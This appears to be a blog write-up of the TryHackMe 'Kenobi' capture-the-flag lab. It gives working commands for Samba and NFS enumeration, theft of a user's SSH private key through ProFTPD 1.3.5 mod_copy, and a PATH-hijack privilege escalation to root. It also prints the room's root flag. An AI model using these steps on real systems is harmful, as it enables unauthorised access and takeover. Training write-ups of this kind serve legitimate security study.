Open in app

Sign in

Write

Sign in

Kenobi

David Kennedy
5 min readNov 7, 2021

Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation. — via TryHackMe.

via — eranico.com

Task 1: Deploy the vulnerable machine

#1 Make sure you’re connected to our network and deploy the machine

No answer needed.

#2 Scan the machine with nmap, how many ports are open?

export ip=10.10.64.233 ; nmap $ip

7

Task 2: Enumerating Samba for shares

Using nmap we can enumerate a machine for SMB shares.

Nmap has the ability to automate a wide variety of networking tasks. There is a script to enumerate shares:

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $ip

#1 Using the nmap command above, how many shares have been found?

3

#2 Once you’re connected, list the files on the share. What is the file can you see?

To connect:

smbclient //$ip/anonymous

To list:

ls

log.txt

You can recursively download the SMB share too. Submit the username and password as nothing. I was unable to use $ip here:

smbget -R smb://10.10.64.233/anonymous

Inspect the log.txt file

more log.txt

#3 What port is FTP running on?

From inspecting the log.txt file, the following information is displayed regarding the standard FTP port.

The initial nmap port scan will have shown port 111 running the service rpcbind. This is a server that converts remote procedure call (RPC) program number into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number its prepared to serve.

In this case, port 111 is access to a network file system. Lets use nmap to enumerate this port:

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.64.233

#4 What mount can we see?

/var

Task 3: Gain initial access with ProFtpd

ProFtpd is a free and open-source FTP server, compatible with Unix and Windows systems. Its also been vulnerable in the past software versions.

#1 Lets get the version of ProFtpd. Use netcat to connect to the machine on the FTP port. What is the version?

netcat 10.10.64.233 21

1.3.5

#2 How many exploits are there for the ProFTPd running?

We can use searchsploit to find exploits for a particular software version:

searchsploit proftpd | grep 1.3

1.3.5 - ‘mod_copy’ Command Execution (Metasploit)

1.3.5 - ‘mod_copy’ Remote Command Execution

1.3.5 - File Copy

  1. 3.x - Remote Command Execution

4

You should have found an exploit from ProFtpd’s mod_copy module.

The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.

We know that the FTP service is running as the Kenobi user (from the file on the share) and an ssh key is generated for that user.

We’re now going to copy Kenobi’s private key using SITE CPFR and SITE CPTO commands:

nc $ip 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

We knew that the /var directory was a mount we could see. So we’ve now moved Kenobi’s private key to the /var/tmp directory.

Lets mount the /var/tmp directory to our machine

mkdir /mnt/kenobiNFS
mount machine_ip:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS

We now have a network mount on our deployed machine! We can go to /var/tmp and get the private key then login to Kenobi’s account.

cp /mnt/kenobiNFS/tmp/id_rsa .
sudo chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.120.253ls -al
more user.txt

Task 4: Privilege Escalation with Path Variable Manipulation

SUID bits can be dangerous, some binaries such as passwd need to be run with elevated privileges (as its resetting your password on the system), however other custom files could that have the SUID bit can lead to all sorts of issues.

To search the a system for these type of files run the following:

find / -perm -u=s -type f 2>/dev/null

#1 What file looks particularly out of the ordinary?

/usr/bin/menu

#2 Run the binary, how many options appear?

/usr/bin/menu

3

Strings is a command on Linux that looks for human readable strings on a binary.

strings /usr/bin/menu

This shows us the binary is running without a full path (e.g. not using /usr/bin/curl or /usr/bin/uname).

As this file runs as the root users privileges, we can manipulate our path gain a root shell.

cd ..
cd tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
/usr/bin/menu

We copied the /bin/sh shell, called it curl, gave it the correct permissions and then put its location in our path. This meant that when the /usr/bin/menu binary was run, its using our path variable to find the “curl” binary.. Which is actually a version of /usr/sh, as well as this file being run as root it runs our shell as root.

whoami
cd /root
ls -al
more root.txt

#3 What is the root flag (/root/root.txt)?

177b3cd8562289f37382721c28381f02
Kenobi
Tryhackme
Writeup

--

--

David Kennedy

Written by David Kennedy

2 Followers

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams